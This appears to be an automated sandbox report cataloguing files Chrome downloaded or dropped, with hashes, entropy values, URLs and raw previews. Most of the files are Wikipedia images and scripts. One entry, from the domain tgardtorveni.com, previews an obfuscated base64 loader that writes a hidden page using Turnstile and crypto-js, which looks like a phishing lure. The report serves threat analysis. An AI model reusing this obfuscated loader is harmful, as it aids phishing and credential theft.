                                        SHA1:E6F58AAEC8F31EB222F9E10FA9E9F64B79AE888C
                                        SHA-256:4A702E2EDA9F4D04325A90088FBE04003D335B09A2F62AB52A05BD6B4441208E
                                        SHA-512:9E7869BC5C466D5EFBA51FB10B6C10443AA74D71EEEA671EDBBD1DB73E3D842B574A24AB48C267221D3BF20EAB77EF27CDDB0A4717AB5075942A7D02998AB138
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/static/images/project-logos/enwiki.png
                                        Preview:.PNG........IHDR..............-x.....PLTEGpL..............WWW......................SSS..........................<<?.......................................TRTXVW...............a`a.........................^^^.........oop......nnoxyz{{{.....TTTWWX.........rss...lll..........................................................................................................................................................................hgh...[Z[...................kkk.................._]^......3/1...=::..............................yxy.....||}...KII...ONO.....................EBC.................................nmn...ede845.........rqs.......................................................................................................................vuv......................|....tRNS.5..V....4G".......n........r..r\..i....F.............-_.....|....D....\.........6.>../f.n.a...N.........CV...[~s.w..*H$....{i.....u..r-...;IDATx^..N.@...Z+..)F......SX.q...~.$.w.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 12 x 17, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):815
                                        Entropy (8bit):6.252556477484235
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CE57048093A045C1914D1D8F647A5CB8
                                        SHA1:AD13977099186A7DEBEBFC352C1FFC424B2D75E2
                                        SHA-256:CDC6EDA4757C52104A4429D464692E2446DBCDBBCEA46FF452B046EED7FC890F
                                        SHA-512:794B56D909F02526403CDFCD99FF0F45B9C060251F6E04EED659FC5A31C3756378B516557F97934291CCC4430C86F147199E6BB888A812D74170E6FCB2FC7D48
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE....f.....U..f..e..g..f..m..f..e..f..e..d..e..e..`.....U..f..f..f..f..g..f..e..e..e..f..f..g..g..e..d..g..g..f..k..f.>>^...;>_.h..f..f..g..g........f..f..f..g..e........f..g..f..c.s.(......q.(.f..e..e..e..e..U..e..e.....e..f..b..g..[..e..f..e..e..f..f..g..f..f..f..g..e..f..f........6.#...[tRNS.p...j^......3.~......}..X.5...*+../.+ZW.V,...Y.....N.....m..l.S..?*.V.......&.........i.......bKGD]..0.....tIME.......d..n....IDAT..U....P.C.;..sq.............<..IS..D./2....T...F...~.Qgb.b.........4.7u......@0D..(....\....d.(..,_._,.+.X-.j<....jw.M..C.....x4..)fs.X..jM6f`.....D...g..z..e...f....`.....%tEXtdate:create.2024-06-13T06:13:07+00:00,t.....%tEXtdate:modify.2024-06-13T06:13:07+00:00]).|....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:1
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):874
                                        Entropy (8bit):7.765296804109958
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:DCD2BA7643ED7F92D4CC9E6054FDDD0D
                                        SHA1:146213E345F7034EDF228A524BF407090FA6A429
                                        SHA-256:0C86A29D0DE71723562495DA3FF4F54C852BFF02644664F95F0DB7481522A309
                                        SHA-512:5F68F4579A267AF611F9F67B566B9271C6B03D5572F89A92FF62E6E8D53953C0AB51FC861ED5B4CED3CB3D82292EAB872EB0F37B89C245F6EB4F3BFCC8C5F004
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/3/32/Scholia_logo.svg/40px-Scholia_logo.svg.png
                                        Preview:RIFFb...WEBPVP8LV.../'.....7.$.V.>~.I.....|.%.v.Q$.....&.c....Ap.^;.d[U....K...?..`.p I..H.RI.fX.......w..3..M.U.."P..{^..3....P(.....o...mv....(Q. |.".?.+K.a....%....4.ct....e.ps.C.z.?B..p} ..P....@p..P.6...R"....9Bj..p.E.&.-V..4...%'......xO.....ta-..=....^~..?g....:....N.&..*.I..U....($......CH?i9.......}.ym..I.[3...A......T.....Y.I@.....E:.0............... ....H..T1.V.H.hB.G.3S.-U..{.y../.....o.5...M..n.6...v..Fj......1k.N.8..:.w......|.;..7.M.....d...[...%.L..F.}B9.2.A.....y.q++....-...........I.]f.*.._.2.b.....JU.86HA.X.t\Y.".,k;.D9..[.kyV@P..47...X.f.-..XE..4....8.g%..b..../BPV.9P.H...H;..O.... .=..9^zH.2.o.,8qF5.>..|....G..?8..}.+..U1..J. .S.0b.s...g.~....N.......D..L.....Z&M3u.......5,<..S..X. ...F.. 6.|1.....r1"/Z....F.../..z>......05.r......*I.m.h...f.o..qx4Q....2u..7......7...U?........J64V.Q+..zR......MK$.P.....
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                        Category:dropped
                                        Size (bytes):61
                                        Entropy (8bit):3.990210155325004
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (14598)
                                        Category:downloaded
                                        Size (bytes):15145
                                        Entropy (8bit):5.213706836942155
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:9A23BA02FF7782FDD4D790A708B63118
                                        SHA1:654EED55B752C4B8B95D75369DA1932AD544D9FE
                                        SHA-256:9667E797BC54AED76A9A2240D78186D148D4A7554147F5159F49D760C87C2245
                                        SHA-512:E0AC080D0D9FE6B4A7ED30DCCA1779B3D29C5DDAE3B70ADF0E506CF28A691128E84033AB724934B8BFC1C78C8B18AF638443DCA4E3A606AE1C49F5DF3698448E
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://en.wikipedia.org/w/load.php?lang=en&modules=mw.config.values.wbCurrentSiteDetails%2CwbRepo%7Coojs-ui.styles.icons-editing-core&skin=vector-2022&version=1qsoc
                                        Preview:mw.loader.impl(function(){return["mw.config.values.wbCurrentSiteDetails@ln29d",function($,jQuery,require,module){mw.config.set({"wbCurrentSiteDetails":{"shortName":"English","name":"English","id":"enwiki","pageUrl":"//en.wikipedia.org/wiki/$1","apiUrl":"//en.wikipedia.org/w/api.php","languageCode":"en","group":"wikipedia"}});.}];});.mw.loader.impl(function(){return["mw.config.values.wbRepo@18lj4",function($,jQuery,require,module){mw.config.set({"wbRepo":{"url":"https://www.wikidata.org","scriptPath":"/w","articlePath":"/wiki/$1"}});.}];});.mw.loader.impl(function(){return["oojs-ui.styles.icons-editing-core@31b2a",null,{"css":[".oo-ui-icon-edit,.mw-ui-icon-edit:before{background-image:url(\"data:image/svg+xml,%3Csvg xmlns=%22http://www.w3.org/2000/svg%22 width=%2220%22 height=%2220%22 viewBox=%220 0 20 20%22%3E%3Ctitle%3E edit %3C/title%3E%3Cpath d=%22m16.77 8 1.94-2a1 1 0 0 0 0-1.41l-3.34-3.3a1 1 0 0 0-1.41 0L12 3.23zM1 14.25V19h4.75l9.96-9.96-4.75-4.75z%22/%3E%3C/svg%3E\")}.oo-ui-imag
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 21 x 20, 8-bit gray+alpha, non-interlaced
                                        Category:dropped
                                        Size (bytes):576
                                        Entropy (8bit):7.100046661609504
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:0E6C544761AB71737BD453ABAAE12F8A
                                        SHA1:A0A96B0D285BEA6F4250C666364D9F9946D9E544
                                        SHA-256:A909AF838A2DC4730C3BF94B39D238D59BEF1CF34A146390D348CF081ACF248A
                                        SHA-512:AD9889019EC4CB044C6E7865DB281309F97768659310664D6F1DE38520FDCE2D92DA833AF81A1CBDC0025ADA24E9A717F58A0B78849E3FD8C61FA8839D5AD1F7
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR..............B......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME......+..0....HIDAT(..J.a......7MT...G.D....P..!...Z.......[.+......4h.&.FR..l4..m.7.....>.3.......j...4#.)>.2.mV..6.t.C.q..9.-.6'B.e....:..7]....|.....bb".f.:..........O..[_.=.%w..?.V}s........Ma...`..9....ov.N...]...d........;;ix'.|.m.>....R..}.#.O.g..L9....u..Q....]..{.&....MY}..+..T4..QA.9'X.)...\..V..W...R0..,...t.IM|....VdN..8.....%tEXtdate:create.2024-07-07T17:20:43+00:00.H.D...%tEXtdate:modify.2024-07-07T17:20:43+00:00..t.....IEND.B`.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):9814
                                        Entropy (8bit):7.907635432572851
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:65D1C53DA615FD5D8DDEE263BDFD0E76
                                        SHA1:43F5A7135273A2514549586C363B0BB6B1E02E95
                                        SHA-256:F9BB0066147DCAC34D35808818949FA1D033FD124DD0FEBC5A15E17326D18F54
                                        SHA-512:0A4E18CDAAF613DE83DB6B25552556308D86FA781114B720608EEEA1370900E28137B525F9927C22A3C71C981A6EB3A5C1BC1A6D02F241D6227453BAA7BD4AEA
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/en/thumb/a/ac/European_Court_of_Human_Rights.jpg/220px-European_Court_of_Human_Rights.jpg
                                        Preview:RIFFN&..WEBPVP8X.... ......{..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .$...m...*..|.>E..C....L..(.D....s........K... G..f...?....S_1...>u<....n.........Y|.@.n.I...].k....._..S...O...?v......~.u..........?..=B?$...{.'.W.o....>.....3...7....p.....}........[.........^.......o._.O._.......q...O..._p.S...?.M............?..n...A.....p..........xU.VvD.."..@B.....K..CwV;...,g....n..t7B..........}D..EmFpFrw'+....Vp..7.].....ha6...4#.8..C%.7....=.).;F......}...w)S.34[9:V.M83Q....$..4...X..
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 70 x 70, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):1723
                                        Entropy (8bit):7.152055080186883
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:C0CBA5BEFAF28B88AC12AAD597180A6B
                                        SHA1:A8B7D22AFC4A3D2DC2AAFA9105451A2DFC81B62A
                                        SHA-256:54A71C851A1F2997AACA8BF106B2548838004E3C65F34E533096D91AC8369DBB
                                        SHA-512:77DCD2F4A1E9E58E0158AD86240D7B5DD61C24077509820B8F81893F45D428A67BD1D01BA235B02B40E8182ED296A3AAB4B82BCC485EADB0FA0B83C43422457C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR...F...F.....F.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.......[y.Yx.[x.Zx.Zy.Zy.Zy....Uu.Yx.Zz.Zz.Yy.Zy.ff.Zz.Zx.Zy.Zy.Zy.Im.Zz.Zy.Zy.Zz.Uq.Zx.Zy.Yy.Yx.Yy.Yy.Zy.Wy.Zy.Zy.[y.`..Yy.Zy.Uw.Zy.Zy.Zy.[..]t.Zy.Zy.Zy.Zx.Z{.Z{.U..Xy.[y.Zy.Zx.Zy.Zy.Zy.\x.[y.Zy.Yz.@..Zy.Zz.f..[y.Yx.Zz.W|.Zy.Zy.Zy.Zy.Zx.Zy.Zy.[x.Zx.Zy.[x.Zy.Yy.Yz.U..Zx.Zy.Zy.Zy.[x.Zz.Zy.\|.Zy.[y.Yy.[x.Yy.Zz.Xx.Ys.]t.Zy.[y.Zy.]|.[{.Zy.Zy.Zy.Zy.Zy.Yx.Uy.Zx.Zy.[z.Yy.Yy.Zy.Zy.Zx.[y.[y.Wv.Zx.Zz.Zy.Zy.[y.Zy.Yy.[x.Yz.UU.bv.[x.Zy.Zy.[x.Zy.Zy.Zy....3.....tRNS..*Sy......j..i.X.....^..o.[..Y(..&..e...........f6..7_....$..\....v.`#.]..w..Wl.h.xV.....'.P59. .....!8.....d.}.k.g..U..).....b......Q..+.Y.....bKGD........tIME.....(.$.R....^IDATX..X._.A..@E... ..4EK1..HQ.J.J..-KK+33...K.8[..3.3.[.....y~y..../d.;..K.....".....rw..Q..2k..o.~E@....4...P.R.Z..+pX1.`..%tD)H...P.G..56.....$...(...o..Ed(.'t..'..N..z{g..s...v.,<...:C....8By.F5....~N.z.}X...'$.}..d..0....&u..+..UC......5.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 100 x 87, 8-bit/color RGBA, non-interlaced
                                        Category:downloaded
                                        Size (bytes):7575
                                        Entropy (8bit):7.945322102313104
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:31581C4802F6CCFEF5500368018ECCF9
                                        SHA1:D22B302FAFA65A2B32344DC9534CC4217895B8B4
                                        SHA-256:B18F7359375FC834C28AD8F723E8152795751F833D76A6C3DFA9BAE153C341D7
                                        SHA-512:463A99782001E832D231D7938335F757EDC3DE0DE550DF0B74C7EB396FA28D0624CC031210544D250D23265C153DD8C31280C0812C5EE0EEF12DAF38D1674E89
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/a/ae/International_Criminal_Court_logo.svg/100px-International_Criminal_Court_logo.svg.png
                                        Preview:.PNG........IHDR...d...W........W....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.....!'...S....IDATx..y|.....>3IX..{.Q(...IJ....b....)[&.K]_K.h..j..(K..Z...Z..j.*U..L@.**.I@.5.,3...<O.D.0....|>|>.33......~....F..o.eq...8%{.d.H.2\...d.42.....T......{..U2s.$#G...v0~F......Zg6..Q.f.i._R.....2q|...P].:E..{...$Pp3..o..P........k...aT{.[......B.=t..=!...?...:.V.:...._M.R0..B..D@.........Z........]0$...,..i.. .....NGu1 ..s.ze./...]..^L... ....Fp.2.2*..+...K-..[......`L?....&...~2..H....> ...Ey..GD".":.......q....W>.._]AV .4.$...LD...\AFv9.e... #..J.>.........r..........E^2..Gt.kh. `. ..Be3.k...F...,.e....9...D..E$..U.9Y......a#s.<.k....tz.M.&"..`Qq0r..?.|.......O..RW=...P..?.L...(.K.._...8...Z....-@...KP..f!P.. vk..[^ ;.....X@....)...!i...v.h..c.l=...N.......).. y..!.n..t.......R0r.....x..J.....?.lv$..C......zV.l.....[P-..K...DW.=..c....a.0).@.m..$.....y.....W.c}.X...;..5/.\.P.....IV.lF.n......Y.......@*.....N...-8.m.z .G.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:ASCII text, with very long lines (65447)
                                        Category:dropped
                                        Size (bytes):89501
                                        Entropy (8bit):5.289893677458563
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):20792
                                        Entropy (8bit):7.985414928186035
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:53252EF7EA9126619B7CE552399BE48D
                                        SHA1:E62F369EB0CA10522F087EFAEA65E3439C1741DD
                                        SHA-256:A00B477EF84300988A7F0291B99C2799C2C8782F682F7E03AC38DC9CD508A84C
                                        SHA-512:FB50592371B493C8D330D5D641532DCB093B7878376A0BBDA689B86F25B1CB6B7A258D9A741C85AA84D77CA492F9B3C42CDD3F34D075FF3CA1D17D1E2E83DF08
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/2/2c/Fgm_map.svg/220px-Fgm_map.svg.png
                                        Preview:RIFF0Q..WEBPVP8L#Q../.4..`....?.y.s:..1....%....5.K.IA....<<.....cK.c....M... 8..7"'cd.aX3.+1.oc...d=_l.=.Qh.UnwWkW...ZU..U..m.{.Vo......vU....U....w.^..jg.b...m...+.m.l........1.3.....6...C'olcj.vFvj.Gf.mg._<}c...m{l..........F.>2.m...wfv2.m....=..6.Nf....M....mkm.ff......9...23wAi1.8..[7i...6.H.X..#K#..I.fplS...Mb.......F,..l......u.).....].}/=.u..,Z.d...k..m.m.m..e....>....JX.l;Qz0..H........Xy...]....Y..?@....?..s?....~..#=...p...~.....~.."y..m.0dV78m..LOp.....I...... Wpfy."..2..E..ze...a..+Mspw.Lf...48ew.3.\[...v._)...P.......t.M...Iq..........).s.7.].~.....$W.q...p.........NH;...zq.Ip_5W..@.*.6..j....k.NR....w..t..kq....h.b&.]...>..Rt..cm.b[y3.%".....p...2..."w....._.WUo|.w.......m...!...b..c..,..nq..............r<H...x.3..v.m..m..m/.ld....'MW{mxC.$.Q.....n...F>..o..$....JlKw. 'XryB4;)..g...m..>....-...d...GK.{.T.W.V.d...o.=.y.]6..0H.6D..$...5 ..^+...P6...s.I2k..7.1...V......v.As.4c...T..E..?..^P..W6v.....`...+$Kg.)'.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):21964
                                        Entropy (8bit):7.990442982378965
                                        Encrypted:true
                                        SSDEEP:
                                        MD5:DDACB7DDE5FEAC9F11776363CD6D9FCA
                                        SHA1:347E2BA4F7EF265FC0CAE4E164217D60178DEA54
                                        SHA-256:EB8F7A2F8BB9ABBCB8DD859768725ADB4D90FD1C98CB5450D13B27B8EC842F83
                                        SHA-512:855B2E82BDACB96822DBEBFDB08A67611C1473F0007FF5BDE1D660120C8FA5C039BCEA279A6D18C4B12ADC005A0B3D676EA36176197B9CD8D4382731E93644C4
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/8/8f/United_States_Declaration_of_Independence.jpg/220px-United_States_Declaration_of_Independence.jpg
                                        Preview:RIFF.U..WEBPVP8X..............VP8 :U.......*....>=..C"!..m.. .....5....?.<.I`.l.j+....sr..7..........q?..\}...?.z........~....S.'...~......?.../.?.................c..6.......W....&.....W...^........O.....U}..,...C...........>..W.O...?..._........M.../._...?.~..,.......?.................?............{.........<........lrkg.....yd.p.I.H....aA^.@e6q./.$G....~-..A.Jf....^..v...=...b.Yu$....5.....}jf....3a....Q.6....m.....FS.I..j`#.Wh|.-f..\..dI...zw..3......p..A.qH~1.._.].j."...~.?.D....A.F......)+.X&....AS..F.NI3..q..A.^....n&.g}.9h..Ql+....A.L....CQ,y.m....c...bt2j..}.i..Sy..*.DV..U(..B9.0..m.o...zEl.)......X.4...e.@..0....d>.EY.....l'...R...........,..^.e...<. .....g.......`....|t...O.s.. ..K/\F.........3.....c..}.tY..%.pRD.g..Yb..1..]5.......<.k.#[...\.^...V]ek`..=..Pn....x.&.ic..Y..2..x.O....~....~O[....U...|T....; ......>Xv..u.8,6..i.....|O...E......in..H.1....+ ..l@.C_..A.ug..7._...~...,R.rs...*,..Y.IZ..?6..X_.}.dj...7p.
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 220 x 190, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):19595
                                        Entropy (8bit):7.980328119926817
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:EBAF6C5C7FEECCCFA2F444E74888BD32
                                        SHA1:B232CCEE316B7B154A713F9C94D0344DD3103A15
                                        SHA-256:83E264CCDE8AE746268A15547F91142FD64A8B4B9BE56E1A417043C59EF9000A
                                        SHA-512:C434218943C193370325F49CFEDED5CB2C93B05B76816131CB54DF86A0900F0381FC56F1CCF142668C73FEEC3B9E0880C452D9E06866B7F68BC6C75CEC28AE9D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:.PNG........IHDR.............^fa.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.......iCU...K.IDATx..wx[...?.J..I.!...N.3@)t0J.B[F.[v....){...l.....2..1C.....)P...I......q.eI..O.It..O..HW...{..@F2...d$#..HF2...d$#..HF2..!.S*6...d.pF.....v...v0.bq.u5K2...2.b.^.Ft....f4x......<..0..|....o.....d.7.RiQ........DPn.!x*......x.D..:.X..H+h3...U..M...[.......:..,...2B..d.v...`..M`L......z&...l...l..DQ...2.!.........<.....++.....4....c..X\.....<...?wg....e..H....F..i.9-....,oX.VE.(..YQ..l.....vV...,. ....X...............V...P.......w..!..../.......!S*6'.~...@n.W.`d..W.g.s#.i...1K..$.h..B..h.........2+..@.3`..eI..P.L.y'.l........F....z.a.HV.W...0....4T.....8k........w...S.3.K.........N.&.3.._o.5...H...k......:..>.^'..0.\F.~Ja.V&.....?......y.!7E....h.}1....,.......%8...i....7njF.y.....LQ..M.p..E.3@...t..i..p.....m..{jF.7A....^.R.y..Ha.O......6...]. %...p...<..{..i.}...u...H].lF..x......D.n;.a5.;Mr...Yg...~.p.J#..TR....J
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:RIFF (little-endian) data, Web/P image
                                        Category:downloaded
                                        Size (bytes):9670
                                        Entropy (8bit):7.955328205526592
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:73D5BB627D7BEFC2236669C7D90D153B
                                        SHA1:E5FAC59A935D3B64E9F8DE52FE78C2FA1D4D2787
                                        SHA-256:0EA03459FCD70EE87439DA0C618FA3944BD355A4FAFA12ACE5FD58D572A1F809
                                        SHA-512:D139691A63FD9CF5686D16DE5398C0BB28E34D457D8D4975E3B83C498D4D2B5F9E645595C031ABED5786A11665A47E56F7B295FE625159B0BD16800B355D5913
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://upload.wikimedia.org/wikipedia/commons/thumb/a/ae/International_Criminal_Court_logo.svg/220px-International_Criminal_Court_logo.svg.png
                                        Preview:RIFF.%..WEBPVP8L.%../.@/.*...?..9..xWX...=G...O...c~...9...l...U..g....\.*.m...w..6.G.I.iyW.vAs...%{..I.sm...*k..z$&....~..mC..9..L:..AP .......<.U;'.a5. (&...C....f.A...3.g.:...........`..i.X..#q;.xW...0a.pk.l.c.RCk.N..k..V.z.I..9'A.&5..$Q..BpV.....((...D..p...I...]......'m........)-T.fW[..z.....:}V=IA..$I..L.s..NWU.=9..)P.@..^...r...m.y5f....m.m.v..n....|.w.[.'.d_@.'..z..5._.\s..\...2.I.%.tR...A....B.F.U,._.../...n..q.d.....'.E.-..p)..l..J.....R..,F5...F?...CJ.Bg......$i..f%......G.%)eH2.;{2..3Xb..HI.6a.D.X:....5.J<...*cI.?..o.ZlQ.-R..`VJ.......#]...#.tG...B.{..v5<@J. .`.....j.[..X./>.V)WC..M..T..c.....!1......$...t.......[......W.@zQJs...$rw...cDR..2(.5.~.K..J.{.Y:.@}.!....A.#....5Qx,qJ.$..i.0.cI..].#.....|.....e;.jL.#,..9Y.5.:...@.0..Z.....C^"B.$.3.......S.|..Q.1L..}1/#.............1II2gx.WJ...O.C..!........[...t.dL.#..i!..p...Ag...#.X...A4.'..>4 .YF.s..0>Erp.Ac.E.P...T......'p...M.td...I...w..Pg....2..GG....~.MJ..c..;%.k....).....v
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:HTML document, ASCII text, with very long lines (6657), with CRLF line terminators
                                        Category:downloaded
                                        Size (bytes):18296
                                        Entropy (8bit):5.901449461008412
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:06E86BCE9735BDC22F82DAF4D0A546CD
                                        SHA1:DD783D59FB396BB6E674A362F9204B0DB02F8D32
                                        SHA-256:0CC555B2E05CDF3B272329778AD9F39C1BDD32CB7C345EB2EAB82762D96960F4
                                        SHA-512:F60AE2EAFBBFE84A93BB329382DAA92C0890A9B5C7882D36D8AA50EF4C2821CAC44303F4A02CDDCAB92F8F90E5D585F46DFB777EDD425293A0DF0B64D3FE8928
                                        Malicious:false
                                        Reputation:unknown
                                        URL:https://fvi5np.tgardtorveni.com/r6rSI5Yt/
                                        Preview: Your brand is what people say about you when you&#039;re not in the room. -->..<script>....if(atob("aHR0cHM6Ly95M2w1azIudGdhcmR0b3J2ZW5pLmNvbS9yNnJTSTVZdC8=") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:PNG image data, 20 x 20, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):703
                                        Entropy (8bit):6.6442741607808316
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:D3C645D7A37A4C105FD5CC19454D52FE
                                        SHA1:04C00E76A956A4CA3919AD27A1EC1882E5E6C385
                                        SHA-256:80169FA12176A64B65D320184DB3D5F689AF2F5C46AB68332DBC04CAE8224949
                                        SHA-512:0C370D721C16B9F6DDD169D0BE110A0DF304BC255D5E392A80DE6AEEBC7283FE4EF05925F0B46FD5BAA0D7A6BD96FFF54A67A361BF57B8A60D8647C97FCCF218
                                        Malicious:false
                                        Reputation:unknown
